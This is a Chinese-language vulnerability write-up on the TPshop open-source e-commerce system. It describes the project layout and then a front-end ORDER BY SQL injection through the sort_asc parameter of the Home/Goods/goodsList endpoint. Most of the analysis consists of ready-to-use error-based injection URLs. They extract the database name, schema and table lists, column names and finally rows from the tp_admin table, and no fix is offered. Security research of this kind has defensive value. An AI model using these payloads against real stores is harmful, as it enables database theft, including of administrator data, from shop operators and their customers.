### 0x01 说明TPshop开源商城系统( Thinkphp shop的简称 ),是深圳搜豹网络有限公司开发的一套多商家模式的商城系统。适合企业及个人快速构建个性化网上商城。包含PC+IOS客户端+Adroid客户端+微商城,系统PC+后台是基于ThinkPHP5 MVC构架开发的跨平台开源软件,设计得非常灵活,具有模块化架构体系和丰富的功能,易于与第三方应用系统无缝集成,在设计上,包含相当全面,以模块化架构体系,让应用组合变得相当灵活,功能也相当丰富。下载地址:http://www.tp-shop.cn/Index/Index/download.html“`目录大概结构 ├─index.php 入口文件 ├─Install 安装目录 //保存着各种的sql文件 php文件初始化 ├─Thinkphp PHP框架代码 ├─plugins 保存插件的地方 ├─vendor 第三方类库 ├─Public 保存css,js,img,upload的地方 ├─Template 模版文件 //保存手机与电脑端html的地方 │ ├─mobile 手机模版文件 │ ├─pc 电脑模版文件 ├─application 项目文件夹 │ ├─home 电脑端业务代码 //保存着电脑端的各种功能PHP文件 │ │ ├─Controller 控制器 │ │ ├─lang 语言包 │ │ ├─Logic 模型逻辑层(可以当成Services来看) │ │ ├─model 模型层 │ │ ├─validate 验证器 │ │ ├─view 视图(在这框架中并没有什么用) │ ├─admin 管理端业务代码 //保存着管理端的各种功能PHP文件同上 │ ├─mobile 手机端业务代码 //保存着手机端的各种功能PHP文件 │ ├─common 全局公共函数文件夹(我也不懂为什么这里要放一大把的model的东西) │ ├─common.php 全局公共函数文件 │ ├─config php 全局公共配置文件 │ ├─database.php 数据库配置文件 │ ├─function.php 公共函数文件 │ ├─route.php 系统路由文件 │ ├─tags.php 应用行为扩展定义文件“`### 0x02 漏洞分析漏洞:前台sql注入 order by注入文件地址:application/home/controller/Goods.phpURL地址:http://xx.com/Home/Goods/goodsList/id/1/sort/shop_price/sort_asc/desc问题函数:`goodsList()`问题参数_1: `$sort = I('get.sort','goods_id');`// 排序问题参数_2: `$sort_asc = I('get.sort_asc','asc');`// 排序因为是order by 的注入所以要利用一些平时用不到的sql语句爆当前库名:“`http://127.0.0.1:8082/Home/Goods/goodsList/id/1/sort/shop_price/sort_asc/,(SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x2D2D2D2D,(SELECT database() ),0x2D2D2D2D))s), 8446744073709551610, 8446744073709551610)))“`爆此mysql库的总数:“`http://127.0.0.1:8082/Home/Goods/goodsList/id/1/sort/shop_price/sort_asc/,(SELECT 8138 FROM (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x2D2D2D2D,(SELECT IFNULL(CAST(COUNT(schema_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),0x2D2D2D2D))s), 8446744073709551610, 8446744073709551610)))x)“`爆某个库的名称:“`http://127.0.0.1:8082/Home/Goods/goodsList/id/1/sort/shop_price/sort_asc/,(SELECT 4362 FROM (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x2D2D2D2D,(SELECT MID((IFNULL(CAST(schema_name AS CHAR),0x20)),1,451) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),0x2D2D2D2D))s), 8446744073709551610, 8446744073709551610)))x)“`获取某个库表的总数:“`http://127.0.0.1:8082/Home/Goods/goodsList/id/1/sort/shop_price/sort_asc/,(SELECT 8139 FROM (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x2D2D2D2D,(SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x747073686f70322e302e36)),0x2D2D2D2D))s), 8446744073709551610, 8446744073709551610)))x)“`获取某个库每个表的表名:“`http://127.0.0.1:8082/Home/Goods/goodsList/id/1/sort/shop_price/sort_asc/,(SELECT 3572 FROM (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x2D2D2D2D,(SELECT MID((IFNULL(CAST(table_name AS CHAR),0x20)),1,451) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x747073686f70322e302e36) LIMIT 2,1),0x2D2D2D2D))s), 8446744073709551610, 8446744073709551610)))x)“`获取某个表的字段总数:“`http://127.0.0.1:8082/Home/Goods/goodsList/id/1/sort/shop_price/sort_asc/,(SELECT 1965 FROM (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x2D2D2D2D,(SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x74705f61646d696e AND table_schema=0x747073686f70322e302e36),0x2D2D2D2D))s), 8446744073709551610, 8446744073709551610)))x)“`获取某个表 某个字段名称:“`http://127.0.0.1:8082/Home/Goods/goodsList/id/1/sort/shop_price/sort_asc/,(SELECT 3302 FROM (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x2D2D2D2D,(SELECT MID((IFNULL(CAST(column_name AS CHAR),0x20)),1,451) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x74705f61646d696e AND table_schema=0x747073686f70322e302e36 LIMIT 0,1),0x2D2D2D2D))s), 8446744073709551610, 8446744073709551610)))x)“`获取某库某表某字段数据:“`http://127.0.0.1:8082/Home/Goods/goodsList/id/1/sort/shop_price/sort_asc/,(SELECT 2857 FROM (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x2D2D2D2D,(SELECT MID((IFNULL(CAST(admin_id AS CHAR),0x20)),1,451) FROM `tpshop2.0.6`.tp_admin ORDER BY admin_id LIMIT 0,1),0x2D2D2D2D))s), 8446744073709551610, 8446744073709551610)))x)“`
